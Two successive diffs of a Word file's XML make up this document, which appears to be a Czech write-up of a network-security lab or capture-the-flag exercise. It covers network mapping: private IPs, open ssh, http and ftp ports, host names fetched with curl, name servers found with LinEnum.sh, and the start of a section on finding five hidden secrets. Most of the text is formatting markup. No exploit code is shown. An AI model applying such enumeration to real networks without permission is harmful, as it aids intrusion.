--- a/doc.docx
+++ b/doc.docx
@@ -214,12 +214,14 @@
       <w:r>
         <w:t xml:space="preserve">Prvním úkolem je zmapování dané sítě. K uživatelskému stroji se dá připojit pomocí příkazu </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="typewriteChar"/>
         </w:rPr>
         <w:t>ssh</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="typewriteChar"/>
@@ -232,11 +234,33 @@
       <w:r>
         <w:t xml:space="preserve">u </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="typewriteChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">ip addr </w:t>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t>addr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="typewriteChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>je možná zjistit následující připojení:</w:t>
@@ -283,7 +307,13 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t>Kvůli technické chybě nelze vypsat názvy zařízení. Sítě mají následující složení:</w:t>
+        <w:t>Kvůli technické chybě nelze vypsat názvy zařízení</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> sítích</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Sítě mají následující složení:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -300,7 +330,25 @@
           <w:bCs/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Port 22/tcp: ssh (Open)</w:t>
+        <w:t>Port 22/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>: ssh (Open)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -533,7 +581,25 @@
           <w:bCs/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Port 80/tcp: http (Open)</w:t>
+        <w:t>Port 80/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>: http (Open)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -586,7 +652,25 @@
           <w:bCs/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Port 21/tcp: ftp (Open)</w:t>
+        <w:t>Port 21/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>: ftp (Open)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -605,6 +689,47 @@
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">Name servery: 10.89.47.1 a 10.89.1.1 (z </w:t>
+      </w:r>
+      <w:r>
+        <w:t>./LinEnum.sh</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Zranitelnosti</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Nalezení tajemství</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -733,29 +858,39 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="1E6378BD"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="823C97E6"/>
-    <w:lvl w:ilvl="0" w:tplc="C514189E">
+    <w:nsid w:val="149710FB"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="74E02A7C"/>
+    <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="upperRoman"/>
       <w:pStyle w:val="Nadpis1"/>
       <w:lvlText w:val="%1."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="08090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0809001B" w:tentative="1">
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1134"/>
+        </w:tabs>
+        <w:ind w:left="567" w:firstLine="0"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperRoman"/>
+      <w:pStyle w:val="Nadpis2"/>
+      <w:lvlText w:val="%1.%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1134" w:hanging="567"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%3."/>
@@ -763,8 +898,11 @@
       <w:pPr>
         <w:ind w:left="2160" w:hanging="180"/>
       </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0809000F" w:tentative="1">
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%4."/>
@@ -772,8 +910,11 @@
       <w:pPr>
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="08090019" w:tentative="1">
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%5."/>
@@ -781,8 +922,11 @@
       <w:pPr>
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="0809001B" w:tentative="1">
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%6."/>
@@ -790,8 +934,11 @@
       <w:pPr>
         <w:ind w:left="4320" w:hanging="180"/>
       </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="0809000F" w:tentative="1">
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%7."/>
@@ -799,8 +946,11 @@
       <w:pPr>
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="08090019" w:tentative="1">
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerLetter"/>
       <w:lvlText w:val="%8."/>
@@ -808,8 +958,11 @@
       <w:pPr>
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="0809001B" w:tentative="1">
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%9."/>
@@ -817,9 +970,211 @@
       <w:pPr>
         <w:ind w:left="6480" w:hanging="180"/>
       </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1E6378BD"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="18FCCB1E"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperRoman"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperRoman"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="24A03F12"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="94609A0E"/>
+    <w:lvl w:ilvl="0" w:tplc="1A3E04F8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperRoman"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04050019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0405001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0405000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04050019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0405001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0405000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04050019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0405001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="26FE0F37"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8FF8C02C"/>
@@ -932,7 +1287,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="393E3AE3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="88221DA2"/>
@@ -1045,7 +1400,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3FC950B6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4702792C"/>
@@ -1159,19 +1514,55 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1623341023">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="852377884">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="856236304">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="664286676">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="822311795">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="1327170904">
     <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="1555579793">
+    <w:abstractNumId w:val="2"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="30689541">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
@@ -1589,12 +1980,12 @@
     <w:link w:val="Nadpis1Char"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
-    <w:rsid w:val="00ED1022"/>
+    <w:rsid w:val="00D16169"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
       <w:numPr>
-        <w:numId w:val="1"/>
+        <w:numId w:val="8"/>
       </w:numPr>
       <w:spacing w:before="360" w:after="80"/>
       <w:outlineLvl w:val="0"/>
@@ -1608,23 +1999,21 @@
   </w:style>
   <w:style w:type="paragraph" w:styleId="Nadpis2">
     <w:name w:val="heading 2"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Nadpis1"/>
     <w:next w:val="Normln"/>
     <w:link w:val="Nadpis2Char"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="00272002"/>
+    <w:rsid w:val="007D564D"/>
     <w:pPr>
-      <w:keepNext/>
-      <w:keepLines/>
-      <w:spacing w:before="160" w:after="80"/>
+      <w:numPr>
+        <w:ilvl w:val="1"/>
+      </w:numPr>
+      <w:spacing w:before="120"/>
       <w:outlineLvl w:val="1"/>
     </w:pPr>
     <w:rPr>
-      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
-      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
       <w:sz w:val="32"/>
       <w:szCs w:val="32"/>
     </w:rPr>
@@ -1787,6 +2176,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Standardnpsmoodstavce">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Normlntabulka">
@@ -1829,11 +2219,10 @@
     <w:basedOn w:val="Standardnpsmoodstavce"/>
     <w:link w:val="Nadpis2"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
-    <w:rsid w:val="00272002"/>
+    <w:rsid w:val="007D564D"/>
     <w:rPr>
       <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
-      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:color w:val="000000" w:themeColor="text1"/>
       <w:sz w:val="32"/>
       <w:szCs w:val="32"/>
       <w:lang w:val="cs-CZ"/>

--- a/doc.docx
+++ b/doc.docx
@@ -214,14 +214,12 @@
       <w:r>
         <w:t xml:space="preserve">Prvním úkolem je zmapování dané sítě. K uživatelskému stroji se dá připojit pomocí příkazu </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="typewriteChar"/>
         </w:rPr>
         <w:t>ssh</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="typewriteChar"/>
@@ -234,33 +232,11 @@
       <w:r>
         <w:t xml:space="preserve">u </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="typewriteChar"/>
         </w:rPr>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t>addr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="typewriteChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">ip addr </w:t>
       </w:r>
       <w:r>
         <w:t>je možná zjistit následující připojení:</w:t>
@@ -330,25 +306,7 @@
           <w:bCs/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Port 22/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>: ssh (Open)</w:t>
+        <w:t>Port 22/tcp: ssh (Open)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -546,7 +504,16 @@
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>10.89.1.212 (de0bce1672d1)</w:t>
+        <w:t>10.89.1.212 (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>de0bce1672d1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> moje připojovací stanice</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -581,25 +548,7 @@
           <w:bCs/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Port 80/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>: http (Open)</w:t>
+        <w:t>Port 80/tcp: http (Open)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -619,6 +568,33 @@
         </w:rPr>
         <w:t>10.89.1.157</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>The Iron Fortress</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> název z .html nástrojem curl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -637,6 +613,39 @@
         </w:rPr>
         <w:t>10.89.1.159</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Mirkwood</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> název z .html nástrojem curl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -652,25 +661,7 @@
           <w:bCs/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
-        <w:t>Port 21/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>: ftp (Open)</w:t>
+        <w:t>Port 21/tcp: ftp (Open)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -693,8 +684,9 @@
       <w:r>
         <w:br/>
       </w:r>
-      <w:r>
-        <w:br/>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve">Name servery: 10.89.47.1 a 10.89.1.1 (z </w:t>
       </w:r>
       <w:r>
@@ -727,9 +719,544 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="7"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Nalezení tajemství</w:t>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Nalezení </w:t>
+      </w:r>
+      <w:r>
+        <w:t>tajemství</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Připojovací stanici jsem ve složce </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/.hints </w:t>
+      </w:r>
+      <w:r>
+        <w:t>následující popis pěti tajemství A-E:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Nadpis2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
